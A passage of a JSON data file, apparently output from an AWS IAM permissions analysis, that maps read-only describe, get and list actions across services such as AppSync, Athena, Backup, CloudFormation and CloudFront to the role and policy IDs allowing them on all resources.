{"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"application-autoscaling:describeScalingPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"application-autoscaling:describeScheduledActions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:describeMesh": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:describeRoute": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:describeVirtualNode": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:describeVirtualRouter": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:describeVirtualService": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:listMeshes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:listRoutes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:listVirtualNodes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:listVirtualRouters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appmesh:listVirtualServices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:describeDirectoryConfigs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:describeFleets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:describeImageBuilders": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:describeImages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:describeSessions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:describeStacks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:listAssociatedFleets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:listAssociatedStacks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appstream:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:getFunction": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:getGraphqlApi": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:getIntrospectionSchema": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:getResolver": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:getSchemaCreationStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:getType": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:listDataSources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:listFunctions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:listGraphqlApis": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:listResolvers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"appsync:listTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:batchGetNamedQuery": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:batchGetQueryExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:getNamedQuery": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:getQueryExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:getWorkGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:listNamedQueries": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:listQueryExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"athena:listWorkGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling-plans:describeScalingPlanResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling-plans:describeScalingPlans": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling-plans:getScalingPlanResourceForecastData": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:DescribeAccountLimits": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"autoscaling:DescribeAutoScalingGroups": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"autoscaling:DescribeLaunchConfigurations": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"autoscaling:describeAccountLimits": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeAdjustmentTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeAutoScalingGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeAutoScalingInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeAutoScalingNotificationTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeLaunchConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeLifecycleHookTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeLifecycleHooks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeLoadBalancerTargetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeLoadBalancers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeMetricCollectionTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeNotificationConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describePolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeScalingActivities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeScalingProcessTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeScheduledActions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"autoscaling:describeTerminationPolicyTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:describeBackupJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:describeBackupVault": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:describeProtectedResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:describeRecoveryPoint": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:describeRestoreJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:getBackupPlan": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:getBackupPlanFromJSON": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:getBackupPlanFromTemplate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:getBackupSelection": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:getBackupVaultAccessPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:getBackupVaultNotifications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:getRecoveryPointRestoreMetadata": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:getSupportedResourceTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listBackupJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listBackupPlanTemplates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listBackupPlanVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listBackupPlans": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listBackupSelections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listBackupVaults": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listProtectedResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listRecoveryPointsByBackupVault": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listRecoveryPointsByResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listRestoreJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"backup:listTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"batch:describeComputeEnvironments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"batch:describeJobDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"batch:describeJobQueues": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"batch:describeJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"batch:listJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"braket:getDevice": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"braket:getQuantumTask": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"braket:searchDevices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"braket:searchQuantumTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"budgets:viewBudget": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ce:GetReservationPurchaseRecommendation": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ce:GetSavingsPlansPurchaseRecommendation": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ce:getCostAndUsage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ce:getDimensionValues": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ce:getReservationCoverage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ce:getReservationUtilization": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ce:getTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloud9:describeEnvironmentMemberships": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloud9:describeEnvironments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloud9:listEnvironments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"clouddirectory:getDirectory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"clouddirectory:listDirectories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:DescribeAccountLimits": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"cloudformation:DescribeStacks": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"cloudformation:ListStacks": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"cloudformation:describeAccountLimits": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:describeChangeSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:describeStackEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:describeStackInstance": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:describeStackResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:describeStackResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:describeStackSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:describeStackSetOperation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:describeStacks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:estimateTemplateCost": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:getStackPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:getTemplate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:getTemplateSummary": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listChangeSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listExports": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listImports": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listStackInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listStackResources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listStackSetOperationResults": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listStackSetOperations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listStackSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudformation:listStacks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:ListDistributions": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"cloudfront:getCloudFrontOriginAccessIdentity": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:getCloudFrontOriginAccessIdentityConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:getDistribution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:getDistributionConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:getInvalidation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:getStreamingDistribution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:getStreamingDistributionConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:listCloudFrontOriginAccessIdentities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:listDistributions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:listDistributionsByWebACLId": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:listInvalidations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudfront:listStreamingDistributions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudhsm:describeBackups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"cloudhsm:describeClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": 